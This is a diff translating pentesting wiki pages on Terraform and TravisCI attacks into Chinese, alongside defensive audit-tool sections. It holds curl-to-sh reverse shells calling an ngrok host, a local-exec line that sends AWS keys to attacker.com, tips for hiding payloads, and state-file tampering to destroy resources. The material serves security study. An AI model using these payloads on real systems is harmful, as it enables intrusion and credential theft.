+攻击者能够妥协运行 terraform 的系统的主要方式是 **妥协存储 terraform 配置的仓库**,因为在某些时候它们将被 **解释**。 -Actually, there are solutions out there that **execute terraform plan/apply automatically after a PR** is created, such as **Atlantis**: +实际上,市面上有一些解决方案 **在创建 PR 后自动执行 terraform plan/apply**,例如 **Atlantis**: {{#ref}} atlantis-security.md {{#endref}} -If you are able to compromise a terraform file there are different ways you can perform RCE when someone executed `terraform plan` or `terraform apply`. +如果您能够妥协一个 terraform 文件,有不同的方法可以在某人执行 `terraform plan` 或 `terraform apply` 时执行 RCE。 ### Terraform plan -Terraform plan is the **most used command** in terraform and developers/solutions using terraform call it all the time, so the **easiest way to get RCE** is to make sure you poison a terraform config file that will execute arbitrary commands in a `terraform plan`. +Terraform plan 是 terraform 中 **使用最频繁的命令**,开发人员/使用 terraform 的解决方案一直在调用它,因此,**获得 RCE 的最简单方法**是确保您毒化一个 terraform 配置文件,该文件将在 `terraform plan` 中执行任意命令。 -**Using an external provider** +**使用外部提供程序** -Terraform offers the [`external` provider](https://registry.terraform.io/providers/hashicorp/external/latest/docs) which provides a way to interface between Terraform and external programs. You can use the `external` data source to run arbitrary code during a `plan`. - -Injecting in a terraform config file something like the following will execute a rev shell when executing `terraform plan`: +Terraform 提供了 [`external` 提供程序](https://registry.terraform.io/providers/hashicorp/external/latest/docs),它提供了一种在 Terraform 和外部程序之间进行接口的方法。您可以使用 `external` 数据源在 `plan` 期间运行任意代码。 +在 terraform 配置文件中注入如下内容将在执行 `terraform plan` 时执行一个反向 shell: ```javascript data "external" "example" { - program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"] +program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"] } ``` +**使用自定义提供程序** -**Using a custom provider** - -An attacker could send a [custom provider](https://learn.hashicorp.com/tutorials/terraform/provider-setup) to the [Terraform Registry](https://registry.terraform.io/) and then add it to the Terraform code in a feature branch ([example from here](https://alex.kaskaso.li/post/terraform-plan-rce)): - +攻击者可以将一个 [custom provider](https://learn.hashicorp.com/tutorials/terraform/provider-setup) 发送到 [Terraform Registry](https://registry.terraform.io/),然后将其添加到功能分支中的 Terraform 代码中 ([example from here](https://alex.kaskaso.li/post/terraform-plan-rce)): ```javascript - terraform { - required_providers { - evil = { - source = "evil/evil" - version = "1.0" - } - } - } +terraform { +required_providers { +evil = { +source = "evil/evil" +version = "1.0" +} +} +} provider "evil" {} ``` +提供程序在 `init` 中下载,并将在执行 `plan` 时运行恶意代码 -The provider is downloaded in the `init` and will run the malicious code when `plan` is executed +您可以在 [https://github.com/rung/terraform-provider-cmdexec](https://github.com/rung/terraform-provider-cmdexec) 找到一个示例 -You can find an example in [https://github.com/rung/terraform-provider-cmdexec](https://github.com/rung/terraform-provider-cmdexec) +**使用外部引用** -**Using an external reference** - -Both mentioned options are useful but not very stealthy (the second is more stealthy but more complex than the first one). 
You can perform this attack even in a **stealthier way**, by following this suggestions: - -- Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell: +上述两种选项都很有用,但不够隐蔽(第二种比第一种更隐蔽,但更复杂)。您可以通过遵循以下建议以**更隐蔽的方式**执行此攻击: +- 不要直接将反向 shell 添加到 terraform 文件中,您可以**加载一个包含反向 shell 的外部资源**: ```javascript module "not_rev_shell" { - source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules" +source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules" } ``` +您可以在 [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules) 找到 rev shell 代码。 -You can find the rev shell code in [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules) - -- In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b` +- 在外部资源中,使用 **ref** 功能来隐藏 **repo 中分支的 terraform rev shell 代码**,类似于: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b` ### Terraform Apply -Terraform apply will be executed to apply all the changes, you can also abuse it to obtain RCE injecting **a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\ -You just need to make sure some payload like the following ones ends in the `main.tf` file: - +将执行 Terraform apply 以应用所有更改,您也可以利用它通过注入 **一个恶意的 Terraform 文件与** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\ +您只需确保一些有效载荷像以下内容结束于 `main.tf` 文件: ```json // Payload 1 to just steal a secret resource "null_resource" "secret_stealer" { - provisioner "local-exec" { - command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY" - } +provisioner "local-exec" { +command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY" +} } // Payload 2 to get a rev shell resource "null_resource" "rev_shell" { - provisioner "local-exec" { - command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'" - } +provisioner "local-exec" { +command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'" +} } ``` - -Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way using external references**. 
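To keep the external reference looking innocuous, the payload can live in a throwaway commit that is only reachable through the `ref` parameter; a sketch of how that ref value is obtained (repository layout and branch name are made up):

```bash
# In the attacker-controlled module repository
git checkout -b chore/helpers
git add modules/ && git commit -m "chore: update helper module"   # commit containing the local-exec payload
git push origin chore/helpers
git rev-parse --short HEAD   # e.g. b401d2b -> reference it as ...//modules?ref=b401d2b in the module source
```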
+遵循**前一种技术的建议**,以**更隐蔽的方式使用外部引用**执行此攻击。 ## Secrets Dumps -You can have **secret values used by terraform dumped** running `terraform apply` by adding to the terraform file something like: - +您可以通过运行 `terraform apply` 来**转储 terraform 使用的秘密值**,方法是向 terraform 文件中添加如下内容: ```json output "dotoken" { - value = nonsensitive(var.do_token) +value = nonsensitive(var.do_token) } ``` +## 滥用 Terraform 状态文件 -## Abusing Terraform State Files +如果您对 terraform 状态文件具有写入权限但无法更改 terraform 代码,[**这项研究**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) 提供了一些有趣的选项来利用该文件: -In case you have write access over terraform state files but cannot change the terraform code, [**this research**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) gives some interesting options to take advantage of the file: +### 删除资源 -### Deleting resources +有两种方法可以销毁资源: -There are 2 ways to destroy resources: - -1. **Insert a resource with a random name into the state file pointing to the real resource to destroy** - -Because terraform will see that the resource shouldn't exit, it'll destroy it (following the real resource ID indicated). Example from the previous page: +1. **在状态文件中插入一个随机名称的资源,指向要销毁的真实资源** +因为 terraform 会看到该资源不应该存在,所以它会销毁它(根据指示的真实资源 ID)。来自上一页的示例: ```json { - "mode": "managed", - "type": "aws_instance", - "name": "example", - "provider": "provider[\"registry.terraform.io/hashicorp/aws\"]", - "instances": [ - { - "attributes": { - "id": "i-1234567890abcdefg" - } - } - ] +"mode": "managed", +"type": "aws_instance", +"name": "example", +"provider": "provider[\"registry.terraform.io/hashicorp/aws\"]", +"instances": [ +{ +"attributes": { +"id": "i-1234567890abcdefg" +} +} +] }, ``` +2. **以一种无法更新的方式修改要删除的资源(这样它将被删除并重新创建)** -2. **Modify the resource to delete in a way that it's not possible to update (so it'll be deleted a recreated)** - -For an EC2 instance, modifying the type of the instance is enough to make terraform delete a recreate it. +对于 EC2 实例,修改实例的类型足以使 terraform 删除并重新创建它。 ### RCE -It's also possible to [create a custom provider](https://developer.hashicorp.com/terraform/tutorials/providers-plugin-framework/providers-plugin-framework-provider) and just replace one of the providers in the terraform state file for the malicious one or add an empty resource with the malicious provider. Example from the original research: - +还可以 [创建自定义提供程序](https://developer.hashicorp.com/terraform/tutorials/providers-plugin-framework/providers-plugin-framework-provider),并仅替换 terraform 状态文件中的一个提供程序为恶意提供程序,或添加一个带有恶意提供程序的空资源。原始研究的示例: ```json "resources": [ { - "mode": "managed", - "type": "scaffolding_example", - "name": "example", - "provider": "provider[\"registry.terraform.io/dagrz/terrarizer\"]", - "instances": [ +"mode": "managed", +"type": "scaffolding_example", +"name": "example", +"provider": "provider[\"registry.terraform.io/dagrz/terrarizer\"]", +"instances": [ - ] +] }, ``` +### 替换黑名单提供者 -### Replace blacklisted provider - -In case you encounter a situation where `hashicorp/external` was blacklisted, you can re-implement the `external` provider by doing the following. Note: We use a fork of external provider published by https://registry.terraform.io/providers/nazarewk/external/latest. You can publish your own fork or re-implementation as well. 
- +如果您遇到 `hashicorp/external` 被列入黑名单的情况,可以通过以下方式重新实现 `external` 提供者。注意:我们使用的是由 https://registry.terraform.io/providers/nazarewk/external/latest 发布的 external 提供者的分支。您也可以发布自己的分支或重新实现。 ```terraform terraform { - required_providers { - external = { - source = "nazarewk/external" - version = "3.0.0" - } - } +required_providers { +external = { +source = "nazarewk/external" +version = "3.0.0" +} +} } ``` - -Then you can use `external` as per normal. - +然后您可以像往常一样使用 `external`。 ```terraform data "external" "example" { - program = ["sh", "-c", "whoami"] +program = ["sh", "-c", "whoami"] } ``` +## 自动审计工具 -## Automatic Audit Tools +### [**Snyk 基础设施即代码 (IaC)**](https://snyk.io/product/infrastructure-as-code-security/) -### [**Snyk Infrastructure as Code (IaC)**](https://snyk.io/product/infrastructure-as-code-security/) - -Snyk offers a comprehensive Infrastructure as Code (IaC) scanning solution that detects vulnerabilities and misconfigurations in Terraform, CloudFormation, Kubernetes, and other IaC formats. - -- **Features:** - - Real-time scanning for security vulnerabilities and compliance issues. - - Integration with version control systems (GitHub, GitLab, Bitbucket). - - Automated fix pull requests. - - Detailed remediation advice. -- **Sign Up:** Create an account on [Snyk](https://snyk.io/). +Snyk 提供全面的基础设施即代码 (IaC) 扫描解决方案,能够检测 Terraform、CloudFormation、Kubernetes 和其他 IaC 格式中的漏洞和配置错误。 +- **特点:** +- 实时扫描安全漏洞和合规性问题。 +- 与版本控制系统(GitHub、GitLab、Bitbucket)集成。 +- 自动修复拉取请求。 +- 详细的修复建议。 +- **注册:** 在 [Snyk](https://snyk.io/) 上创建一个账户。 ```bash brew tap snyk/tap brew install snyk snyk auth snyk iac test /path/to/terraform/code ``` - ### [Checkov](https://github.com/bridgecrewio/checkov) -**Checkov** is a static code analysis tool for infrastructure as code (IaC) and also a software composition analysis (SCA) tool for images and open source packages. +**Checkov** 是一个用于基础设施即代码 (IaC) 的静态代码分析工具,同时也是一个用于图像和开源包的软件组成分析 (SCA) 工具。 -It scans cloud infrastructure provisioned using [Terraform](https://terraform.io/), [Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md), [Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md), [Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md), [OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md), [ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md), or [OpenTofu](https://opentofu.org/) and detects security and compliance misconfigurations using graph-based scanning. - -It performs [Software Composition Analysis (SCA) scanning](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Sca.md) which is a scan of open source packages and images for Common Vulnerabilities and Exposures (CVEs). 
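Besides pointing it at a directory of HCL, Checkov can also scan a rendered Terraform plan, which catches issues that only become visible after expressions are resolved; a quick sketch (file names are arbitrary and flags may vary slightly between versions):

```bash
terraform init && terraform plan -out tf.plan   # build the plan
terraform show -json tf.plan > tf.plan.json     # convert it to the JSON representation
checkov -f tf.plan.json                         # scan the resolved plan instead of the raw HCL
```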
+它扫描使用 [Terraform](https://terraform.io/) 提供的云基础设施、[Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md)、[Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md)、[AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md)、[Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md)、[Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md)、[Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md)、[Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md)、[Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md)、[Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md)、[OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md)、[ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md) 或 [OpenTofu](https://opentofu.org/) 提供的,并使用基于图形的扫描检测安全和合规性错误配置。 +它执行 [软件组成分析 (SCA) 扫描](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Sca.md),这是对开源包和图像进行的扫描,以查找常见漏洞和暴露 (CVE)。 ```bash pip install checkov checkov -d /path/to/folder ``` - ### [terraform-compliance](https://github.com/terraform-compliance/cli) -From the [**docs**](https://github.com/terraform-compliance/cli): `terraform-compliance` is a lightweight, security and compliance focused test framework against terraform to enable negative testing capability for your infrastructure-as-code. +来自 [**docs**](https://github.com/terraform-compliance/cli):`terraform-compliance` 是一个轻量级的,专注于安全和合规性的测试框架,针对 terraform 以启用基础设施即代码的负面测试能力。 -- **compliance:** Ensure the implemented code is following security standards, your own custom standards -- **behaviour driven development:** We have BDD for nearly everything, why not for IaC ? -- **portable:** just install it from `pip` or run it via `docker`. See [Installation](https://terraform-compliance.com/pages/installation/) -- **pre-deploy:** it validates your code before it is deployed -- **easy to integrate:** it can run in your pipeline (or in git hooks) to ensure all deployments are validated. -- **segregation of duty:** you can keep your tests in a different repository where a separate team is responsible. +- **合规性:** 确保实施的代码遵循安全标准和您自己的自定义标准 +- **行为驱动开发:** 我们几乎为所有事物都采用 BDD,为什么不为 IaC 采用呢? +- **可移植:** 只需从 `pip` 安装或通过 `docker` 运行。请参见 [安装](https://terraform-compliance.com/pages/installation/) +- **预部署:** 在代码部署之前进行验证 +- **易于集成:** 它可以在您的管道中运行(或在 git hooks 中),以确保所有部署都经过验证。 +- **职责分离:** 您可以将测试保存在不同的代码库中,由一个独立的团队负责。 > [!NOTE] -> Unfortunately if the code is using some providers you don't have access to you won't be able to perform the `terraform plan` and run this tool. - +> 不幸的是,如果代码使用了一些您没有访问权限的提供者,您将无法执行 `terraform plan` 并运行此工具。 ```bash pip install terraform-compliance terraform plan -out=plan.out terraform-compliance -f /path/to/folder ``` - ### [tfsec](https://github.com/aquasecurity/tfsec) -From the [**docs**](https://github.com/aquasecurity/tfsec): tfsec uses static analysis of your terraform code to spot potential misconfigurations. 
- -- ☁️ Checks for misconfigurations across all major (and some minor) cloud providers -- ⛔ Hundreds of built-in rules -- 🪆 Scans modules (local and remote) -- ➕ Evaluates HCL expressions as well as literal values -- ↪️ Evaluates Terraform functions e.g. `concat()` -- 🔗 Evaluates relationships between Terraform resources -- 🧰 Compatible with the Terraform CDK -- 🙅 Applies (and embellishes) user-defined Rego policies -- 📃 Supports multiple output formats: lovely (default), JSON, SARIF, CSV, CheckStyle, JUnit, text, Gif. -- 🛠️ Configurable (via CLI flags and/or config file) -- ⚡ Very fast, capable of quickly scanning huge repositories +来自[**docs**](https://github.com/aquasecurity/tfsec):tfsec使用对您的terraform代码的静态分析来发现潜在的错误配置。 +- ☁️ 检查所有主要(和一些次要)云提供商的错误配置 +- ⛔ 数百条内置规则 +- 🪆 扫描模块(本地和远程) +- ➕ 评估HCL表达式以及字面值 +- ↪️ 评估Terraform函数,例如`concat()` +- 🔗 评估Terraform资源之间的关系 +- 🧰 与Terraform CDK兼容 +- 🙅 应用(并美化)用户定义的Rego策略 +- 📃 支持多种输出格式:lovely(默认),JSON,SARIF,CSV,CheckStyle,JUnit,文本,Gif。 +- 🛠️ 可配置(通过CLI标志和/或配置文件) +- ⚡ 非常快速,能够快速扫描大型代码库 ```bash brew install tfsec tfsec /path/to/folder ``` - ### [KICKS](https://github.com/Checkmarx/kics) -Find security vulnerabilities, compliance issues, and infrastructure misconfigurations early in the development cycle of your infrastructure-as-code with **KICS** by Checkmarx. - -**KICS** stands for **K**eeping **I**nfrastructure as **C**ode **S**ecure, it is open source and is a must-have for any cloud native project. +使用 **KICS** 由 Checkmarx 提供的工具,在基础设施即代码的开发周期早期发现安全漏洞、合规性问题和基础设施配置错误。 +**KICS** 代表 **K**eeping **I**nfrastructure as **C**ode **S**ecure,它是开源的,是任何云原生项目的必备工具。 ```bash docker run -t -v $(pwd):/path checkmarx/kics:latest scan -p /path -o "/path/" ``` - ### [Terrascan](https://github.com/tenable/terrascan) -From the [**docs**](https://github.com/tenable/terrascan): Terrascan is a static code analyzer for Infrastructure as Code. Terrascan allows you to: - -- Seamlessly scan infrastructure as code for misconfigurations. -- Monitor provisioned cloud infrastructure for configuration changes that introduce posture drift, and enables reverting to a secure posture. -- Detect security vulnerabilities and compliance violations. -- Mitigate risks before provisioning cloud native infrastructure. -- Offers flexibility to run locally or integrate with your CI\CD. +来自[**文档**](https://github.com/tenable/terrascan):Terrascan 是一个用于基础设施即代码的静态代码分析器。Terrascan 允许您: +- 无缝扫描基础设施即代码中的错误配置。 +- 监控已配置的云基础设施的配置更改,以防止姿态漂移,并能够恢复到安全姿态。 +- 检测安全漏洞和合规性违规。 +- 在配置云原生基础设施之前减轻风险。 +- 提供灵活性,可以在本地运行或与您的 CI\CD 集成。 ```bash brew install terrascan ``` - -## References +## 参考文献 - [Atlantis Security](atlantis-security.md) - [https://alex.kaskaso.li/post/terraform-plan-rce](https://alex.kaskaso.li/post/terraform-plan-rce) @@ -310,7 +280,3 @@ brew install terrascan - [https://blog.plerion.com/hacking-terraform-state-privilege-escalation/](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) {{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/todo.md b/src/pentesting-ci-cd/todo.md index 63a3bb5c8..ce75869eb 100644 --- a/src/pentesting-ci-cd/todo.md +++ b/src/pentesting-ci-cd/todo.md @@ -2,7 +2,7 @@ {{#include ../banners/hacktricks-training.md}} -Github PRs are welcome explaining how to (ab)use those platforms from an attacker perspective +欢迎提交Github PR,解释如何从攻击者的角度(滥)用这些平台 - Drone - TeamCity @@ -11,10 +11,6 @@ Github PRs are welcome explaining how to (ab)use those platforms from an attacke - Rancher - Mesosphere - Radicle -- Any other CI/CD platform... 
+- 任何其他CI/CD平台... {{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/travisci-security/README.md b/src/pentesting-ci-cd/travisci-security/README.md index cff623392..2118a6ebb 100644 --- a/src/pentesting-ci-cd/travisci-security/README.md +++ b/src/pentesting-ci-cd/travisci-security/README.md @@ -2,68 +2,64 @@ {{#include ../../banners/hacktricks-training.md}} -## What is TravisCI +## 什么是 TravisCI -**Travis CI** is a **hosted** or on **premises** **continuous integration** service used to build and test software projects hosted on several **different git platform**. +**Travis CI** 是一个 **托管** 或 **本地** 的 **持续集成** 服务,用于构建和测试托管在多个 **不同 git 平台** 上的软件项目。 {{#ref}} basic-travisci-information.md {{#endref}} -## Attacks +## 攻击 -### Triggers +### 触发器 -To launch an attack you first need to know how to trigger a build. By default TravisCI will **trigger a build on pushes and pull requests**: +要发起攻击,您首先需要知道如何触发构建。默认情况下,TravisCI 会在 **推送和拉取请求** 时 **触发构建**: ![](<../../images/image (145).png>) -#### Cron Jobs +#### 定时任务 -If you have access to the web application you can **set crons to run the build**, this could be useful for persistence or to trigger a build: +如果您可以访问该 web 应用程序,您可以 **设置定时任务来运行构建**,这对于持久性或触发构建可能很有用: ![](<../../images/image (243).png>) > [!NOTE] -> It looks like It's not possible to set crons inside the `.travis.yml` according to [this](https://github.com/travis-ci/travis-ci/issues/9162). +> 根据 [这个](https://github.com/travis-ci/travis-ci/issues/9162) 的说法,似乎无法在 `.travis.yml` 中设置定时任务。 -### Third Party PR +### 第三方 PR -TravisCI by default disables sharing env variables with PRs coming from third parties, but someone might enable it and then you could create PRs to the repo and exfiltrate the secrets: +TravisCI 默认禁用与来自第三方的 PR 共享环境变量,但有人可能会启用它,然后您可以创建 PR 到该仓库并提取机密: ![](<../../images/image (208).png>) -### Dumping Secrets +### 转储机密 -As explained in the [**basic information**](basic-travisci-information.md) page, there are 2 types of secrets. **Environment Variables secrets** (which are listed in the web page) and **custom encrypted secrets**, which are stored inside the `.travis.yml` file as base64 (note that both as stored encrypted will end as env variables in the final machines). +如 [**基本信息**](basic-travisci-information.md) 页面所述,有两种类型的机密。**环境变量机密**(在网页上列出)和 **自定义加密机密**,这些机密存储在 `.travis.yml` 文件中,采用 base64 编码(请注意,两个加密存储的最终都会作为环境变量出现在最终机器上)。 -- To **enumerate secrets** configured as **Environment Variables** go to the **settings** of the **project** and check the list. However, note that all the project env variables set here will appear when triggering a build. -- To enumerate the **custom encrypted secrets** the best you can do is to **check the `.travis.yml` file**. 
-- To **enumerate encrypted files** you can check for **`.enc` files** in the repo, for lines similar to `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` in the config file, or for **encrypted iv and keys** in the **Environment Variables** such as: +- 要 **枚举配置为环境变量的机密**,请转到 **项目** 的 **设置** 并检查列表。但是,请注意,在触发构建时,这里设置的所有项目环境变量都会出现。 +- 要枚举 **自定义加密机密**,您能做的最好是 **检查 `.travis.yml` 文件**。 +- 要 **枚举加密文件**,您可以检查仓库中的 **`.enc` 文件**,查找配置文件中类似于 `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` 的行,或在 **环境变量** 中查找 **加密的 iv 和密钥**,例如: ![](<../../images/image (81).png>) -### TODO: +### 待办事项: -- Example build with reverse shell running on Windows/Mac/Linux -- Example build leaking the env base64 encoded in the logs +- 示例构建在 Windows/Mac/Linux 上运行反向 shell +- 示例构建在日志中泄露环境变量的 base64 编码 -### TravisCI Enterprise +### TravisCI 企业版 -If an attacker ends in an environment which uses **TravisCI enterprise** (more info about what this is in the [**basic information**](basic-travisci-information.md#travisci-enterprise)), he will be able to **trigger builds in the the Worker.** This means that an attacker will be able to move laterally to that server from which he could be able to: +如果攻击者进入一个使用 **TravisCI 企业版** 的环境(有关这是什么的更多信息,请参见 [**基本信息**](basic-travisci-information.md#travisci-enterprise)),他将能够 **在 Worker 中触发构建**。这意味着攻击者将能够从中横向移动到该服务器,从而能够: -- escape to the host? -- compromise kubernetes? -- compromise other machines running in the same network? -- compromise new cloud credentials? +- 逃逸到主机? +- 破坏 kubernetes? +- 破坏同一网络中运行的其他机器? +- 破坏新的云凭证? -## References +## 参考 - [https://docs.travis-ci.com/user/encrypting-files/](https://docs.travis-ci.com/user/encrypting-files/) - [https://docs.travis-ci.com/user/best-practices-security](https://docs.travis-ci.com/user/best-practices-security) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md b/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md index 46b10bf38..73b45462a 100644 --- a/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md +++ b/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md @@ -4,45 +4,42 @@ ## Access -TravisCI directly integrates with different git platforms such as Github, Bitbucket, Assembla, and Gitlab. It will ask the user to give TravisCI permissions to access the repos he wants to integrate with TravisCI. +TravisCI 直接与不同的 git 平台集成,如 Github、Bitbucket、Assembla 和 Gitlab。它会要求用户授予 TravisCI 访问他想要与 TravisCI 集成的仓库的权限。 -For example, in Github it will ask for the following permissions: +例如,在 Github 中,它会请求以下权限: -- `user:email` (read-only) -- `read:org` (read-only) -- `repo`: Grants read and write access to code, commit statuses, collaborators, and deployment statuses for public and private repositories and organizations. +- `user:email`(只读) +- `read:org`(只读) +- `repo`:授予对公共和私有仓库及组织的代码、提交状态、协作者和部署状态的读写访问权限。 ## Encrypted Secrets ### Environment Variables -In TravisCI, as in other CI platforms, it's possible to **save at repo level secrets** that will be saved encrypted and be **decrypted and push in the environment variable** of the machine executing the build. 
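Besides the values managed in the web settings, secrets can also be pushed as custom encrypted entries straight into `.travis.yml` with the Travis CLI; a sketch reusing the example repo slug used elsewhere on this page:

```bash
# Encrypts VAR=value with the repository's public RSA key and appends a `secure:` entry to .travis.yml
travis encrypt MY_SECRET=super_secret_value -r carlospolop/t-ci-test --add
```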
+在 TravisCI 中,与其他 CI 平台一样,可以 **在仓库级别保存秘密**,这些秘密将被加密保存,并在执行构建的机器的 **环境变量** 中 **解密并推送**。 ![](<../../images/image (203).png>) -It's possible to indicate the **branches to which the secrets are going to be available** (by default all) and also if TravisCI **should hide its value** if it appears **in the logs** (by default it will). +可以指示 **秘密将可用的分支**(默认是所有)以及 TravisCI **是否应该隐藏其值**,如果它出现在 **日志中**(默认会隐藏)。 ### Custom Encrypted Secrets -For **each repo** TravisCI generates an **RSA keypair**, **keeps** the **private** one, and makes the repository’s **public key available** to those who have **access** to the repository. - -You can access the public key of one repo with: +对于 **每个仓库**,TravisCI 生成一个 **RSA 密钥对**,**保留** **私钥**,并将仓库的 **公钥提供给** 有 **访问权限** 的人。 +您可以通过以下方式访问一个仓库的公钥: ``` travis pubkey -r / travis pubkey -r carlospolop/t-ci-test ``` - -Then, you can use this setup to **encrypt secrets and add them to your `.travis.yaml`**. The secrets will be **decrypted when the build is run** and accessible in the **environment variables**. +然后,您可以使用此设置来**加密秘密并将其添加到您的 `.travis.yaml`**。这些秘密将在**构建运行时解密**并可在**环境变量**中访问。 ![](<../../images/image (139).png>) -Note that the secrets encrypted this way won't appear listed in the environmental variables of the settings. +请注意,以这种方式加密的秘密不会出现在设置的环境变量列表中。 -### Custom Encrypted Files - -Same way as before, TravisCI also allows to **encrypt files and then decrypt them during the build**: +### 自定义加密文件 +与之前一样,TravisCI 还允许**加密文件并在构建期间解密它们**: ``` travis encrypt-file super_secret.txt -r carlospolop/t-ci-test @@ -52,7 +49,7 @@ storing secure env variables for decryption Please add the following to your build script (before_install stage in your .travis.yml, for instance): - openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d +openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d Pro Tip: You can add it automatically by running with --add. @@ -60,37 +57,32 @@ Make sure to add super_secret.txt.enc to the git repository. Make sure not to add super_secret.txt to the git repository. Commit all changes to your .travis.yml. ``` - -Note that when encrypting a file 2 Env Variables will be configured inside the repo such as: +注意,当加密文件时,将在仓库中配置 2 个环境变量,如下所示: ![](<../../images/image (170).png>) -## TravisCI Enterprise +## TravisCI 企业版 -Travis CI Enterprise is an **on-prem version of Travis CI**, which you can deploy **in your infrastructure**. Think of the ‘server’ version of Travis CI. Using Travis CI allows you to enable an easy-to-use Continuous Integration/Continuous Deployment (CI/CD) system in an environment, which you can configure and secure as you want to. +Travis CI 企业版是 **Travis CI 的本地版本**,您可以在 **您的基础设施中部署**。可以将其视为 Travis CI 的“服务器”版本。使用 Travis CI 允许您在一个环境中启用易于使用的持续集成/持续部署 (CI/CD) 系统,您可以根据需要进行配置和安全设置。 -**Travis CI Enterprise consists of two major parts:** +**Travis CI 企业版由两个主要部分组成:** -1. TCI **services** (or TCI Core Services), responsible for integration with version control systems, authorizing builds, scheduling build jobs, etc. -2. TCI **Worker** and build environment images (also called OS images). +1. TCI **服务**(或 TCI 核心服务),负责与版本控制系统的集成、授权构建、调度构建作业等。 +2. TCI **工作节点**和构建环境镜像(也称为操作系统镜像)。 -**TCI Core services require the following:** +**TCI 核心服务需要以下内容:** -1. A **PostgreSQL11** (or later) database. -2. 
